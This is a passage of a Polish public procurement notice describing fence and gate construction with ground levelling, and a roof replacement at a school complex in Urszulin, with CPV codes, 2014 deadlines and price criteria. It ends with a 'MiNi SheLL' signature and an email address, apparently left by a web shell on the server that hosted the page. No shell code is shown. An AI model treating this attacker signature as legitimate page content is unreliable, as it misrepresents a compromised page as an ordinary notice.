Zamówienie obejmuje swoim zakresem budowę  420 m ogrodzenia panelowego  z siatki ocynkowanej ( grubość drutu 5 mm )  zgrzewanej o  wysokości 173 cm , dwóch bram z profili stalowych ocynkowanych długości 6,0 m. Zagospodarowanie terenu obejmuje dowiezienie gruntu  w celu wyrównania i  podniesienia niwelety,  przemieszczanie i plantowanie powierzchni gruntu w celu nadania odpowiedniego spływu wód opadowych.   

Szczegółowy opis przedmiotu zamówienia zawarty jest w przedmiarach robót  - stanowiącym Załącznik Nr 1a do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.00-2, 45.11.30.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> WYMIANA POKRYCIA DACHOWEGO NA BUDYNKU ZESPOŁU SZKÓŁ W  URSZULINIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Określenie przedmiotu oraz wielkości lub zakresu zamówienia:

 W zakres zamówienia wchodzi:
- usunięcie istniejącego pokrycia dachowego, obróbek i rynien;
- wykonanie pokrycia z folii paroprzepuszczalnej;
- nabicie kontr łat;
- pokrycie dachu blachą płaską powlekaną;
- wykonanie niezbędnych obróbek blacharskich;
- montaż kompletnego orynnowania;
- wymiana desek okapowych i wiatrowych;
- montaż nowej podbitki;
- wykonanie zadaszenia tarasu.

Szczegółowy opis przedmiotu zamówienia zawarty jest w przedmiarze robót - stanowiącym Załącznik Nr 1b do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.21.00.00-2, 45.21.42.00-2, 45.26.12.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com